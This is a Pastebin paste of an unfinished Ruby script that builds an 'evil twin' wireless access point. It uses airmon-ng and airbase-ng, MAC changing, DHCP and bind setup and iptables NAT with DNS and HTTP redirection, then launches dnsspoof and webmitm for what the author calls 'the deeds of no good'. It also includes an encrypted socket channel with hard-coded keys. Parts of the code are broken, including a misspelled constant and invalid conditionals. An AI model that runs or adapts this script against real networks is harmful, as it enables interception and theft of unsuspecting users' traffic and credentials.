Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/ruby
- #capn-jack_mr_hai_signature_string
- # this is a work in progress, im going to eventuall make a complete handler for wireless router .
- # I started trying to make a WAP software in rub but after a while I started realizing that I shouldnt reinvent the wheel
- # i should just make a really good car. Im going to incorporate a bit of C and python also, the C to speed it up and the python
- #for some packet manipulation in the stream using scapy.
- #The configurtation options are all constants, i figured that instead of asking each time (since people generally have a
- #consistant setup) you set them in the code, the Class "packet_filter" is the filter (no really?!?!) i generally use nested ifs
- # for the hueristics but you can do whatever here
- #install script
- #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
- require 'socket'
- require 'openssl'
- require 'rubygems'
- require 'net/ssh'
- #find alternatives to avahi and network manager
- #maybe make a WAP connection script?
- # iw? ifconfig? both !
- #airodump to showcase the area, iwconfig to connect
- #dhclient to get an IP
- #ACL from ruby doc
- # have it be invoked as a response to snort
- #
- #ssh/encryption config
- HOST = '192.168.1.113'
- USER = 'username'
- PASS = 'password'
- KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
- IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
- PREAMBLE="begin_encryption"
- #general config
- $ACTBAD=true
- $VERBOSE = true
- LOGGING= true
- MONITOR="mon0"
- EXTIF="eth1"
- TUNNEL="at0"
- INTIF="wlan1"
- TTY="/dev/tty10"
- CHAN = "9"
- ESSID="Firefly"
- `alias wpas='sudo killall -9 wpa_supplicant'`
- `sudo killall -9 avahi-daemon `
- #DHCP config
- RANGE="192.168.1.2 192.168.1.254"
- SCOPE="192.168.1.0"
- GATEWAY="192.168.1.1"
- MASK="255.255.255.0"
- BROADCAST="192.168.1.255"
- DOMAIN="cerberusrouter.net"
- DNS1="208.67.222.222"
- DNS2="208.67.220.220"
- #Handles encryption
- #example
- # #preparing my balls for encryption
- # balls = Encryption.new("balls")
- # #encrypting my balls
- # balls.encrypt_payload
- class Encryption
- def initialize (string)
- @string = string
- end
- #encrypts
- def encrypt_payload
- cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
- cipher.encrypt
- cipher.key = WAPinit::KEY
- cipher.iv = WAPinit::IV
- cipher.update(@string) + cipher.final
- end
- #decrypts
- def decrypt_payload
- cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
- cipher.decrypt
- cipher.key = WAPinit::KEY
- cipher.iv = WAPinit::IV
- cipher.update(@string) + cipher.final
- end
- end
- class Scp_upload
- Net::SCP.start( hostname, username, :password => password ) do|scp|
- scp.upload!( 'scp1.rb', '.' )
- scp.download!( 'test.txt', '.' )
- end
- end
- #this is a socket client to tx/rx streamimg aes-256 encrypted data.
- class Socket_IO_crypt
- def initialize(data, port, host)
- @io_obj = data
- @port = port
- @host = host
- end
- #listens for incomming connections on @port sending a encrypted string with a preamble
- def server
- server = TCPServer.open(@port)
- loop {
- rx = server.accept
- #scans for a preamble and decrypts string sending it to a handler
- if rx.scan(::PREAMBLE)
- encrypted_str = rx.gsub(::PREAMBLE , "")
- decrypted_str = Encryption.new(encrypted_str)
- #send decrypted data to handler, possibly copy of the client?
- else rx.puts "This is not yours"
- rx.close
- end
- }
- end
- #shoots an encrypted message to @host at @port with preamble
- def client
- tx = TCPSocket.open(@host, @port)
- data = Encryption.new(@io_obj)
- crypt_data = data.encrypt_payload
- tx.puts crypt_data
- tx.close
- end
- end
- class Http_server
- def initialize(port, header, max_connect, host)
- @host = host #(insert php server self here)
- end
- end
- #instances of this class start the show
- class WAPinit
- `/etc/init.d/networking restart`
- #file contents of the bind and DHCP servers and the interface file
- interfaces = <<INTERFACE
- #loopback interface
- auto lo iface lo inet loopback
- # interface external network (internet), configured through dhcp
- auto #{EXTIF}
- iface #{EXTIF} inet dhcp
- #interface network 1
- auto #{INTIF}
- iface #{INTIF} inet static
- address #{GATEWAWY}
- netmask #{MASK}
- network #{SCOPE}
- broadcast #{BROADCAST}
- INTERFACE
- bind = <<BIND
- options {
- directory "/var/cache/bind";
- forwarders {
- #{GATEWAY};
- };
- auth-nxdomain no; # conform to RFC1035
- listen-on-v6 { any; };
- };
- BIND
- dhcp3 = <<DHCP
- ddns-update-style interim;
- ignore client-updates;
- subnet #{SCOPE} netmask #{MASK} {
- range #{RANGE};
- option subnet-mask #{MASK}; # Default subnet mask to be used by DHCP clients
- option broadcast-address #{BROADCAST}; # Default broadcast address to be used by DHCP clients
- option routers #{GATEWAY}; # Default gateway to be used by DHCP clients
- option domain-name "#{DOMAIN}";
- option domain-name-servers #{DNS1}, #{DNS2}; # Default DNS to be used by DHCP clients
- }
- # DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
- # option ipforwarding off;
- default-lease-time 21600; # Amount of time in seconds that a client may keep the IP address
- max-lease-time 43200;
- option time-offset -18000; # Eastern Standard Time
- # option ntp-servers 192.168.1.1; # Default NTP server to be used by DHCP clients
- DHCP
- ifaces = File.open("/etc/network/interfaces", "w")
- ifaces.syswrite(interfaces)
- `route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
- `route add -net -n 0.0.0.0 dev #{EXTIF}`
- printf `route`
- if `ifconfig`.match(/mon[0-9]/) = true
- elsif `ifconfig`.match(/at[0-9]/) = true
- elsif `ifconfig`.match(/wlan[0-9]/) = true
- # `sudo killall -9 NetworkManager`
- `sudo killall -9 avahi-daemon`
- `killall -9 wpa_supplicant`
- `airmon-ng start #{INTIF} #{CHAN}`
- `gnome-terminal -e airodump-ng #{MONITOR}`
- `changemac #{EXTIF}`
- `changemac #{INTIF}`
- `killall -9 wpa_supplicant`
- pid = fork do
- `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
- end
- Process.detach(pid)
- else printf "Something happened with the interfaces, please configure your system and plug in any devices"
- end
- sleep 4
- `ifconfig #{TUNNEL} up`
- #begin the router-fu!
- `modprobe ip_tables`
- `modprobe iptable_filter`
- `modprobe ip_conntrack`
- `modprobe ip_conntrack_ftp`
- `modprobe ip_conntrack_irc`
- `modprobe iptable_nat`
- `modprobe ip_nat_ftp`
- `modprobe ip_nat_irc`
- `echo "1" > /proc/sys/net/ipv4/ip_dynaddr`
- `iptables --table nat --flush`
- `iptables --delete-chain`
- `iptables --flush`
- `iptables -P INPUT ACCEPT`
- `iptables -F INPUT `
- `iptables -P OUTPUT ACCEPT`
- `iptables -F OUTPUT `
- `iptables -P FORWARD DROP`
- `iptables -F FORWARD `
- `iptables -t nat -F`
- `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
- `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
- `iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
- `iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
- `iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
- `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
- `iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`
- `echo "1" > /proc/sys/net/ipv4/ip_forward`
- `ifconfig at0 up`
- `ifconfig at0 #{GATEWAY} netmask #{MASK}`
- `ifconfig at0 mtu 1500`
- dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
- dhcpconf.syswrite(dhcp3)
- `dhcpd3 #{TUNNEL}`
- dnsf = File.open("/etc/bind/named.conf.options", "w")
- dnsf.syswrite(bind)
- printf `/etc/init.d/bind9 restart`
- `notify-send "#{ESSID} - Wireless Access Point initialized"`
- end
- #Starting the server
- WAPinit.new
- # so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
- #tranparency and configuring the interfaces.
- #now we begin the deeds of no good
- `dnsspoof -i #{TUNNEL}`
- sleep 1
- `webmitm -d -d -d`
- sleep 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
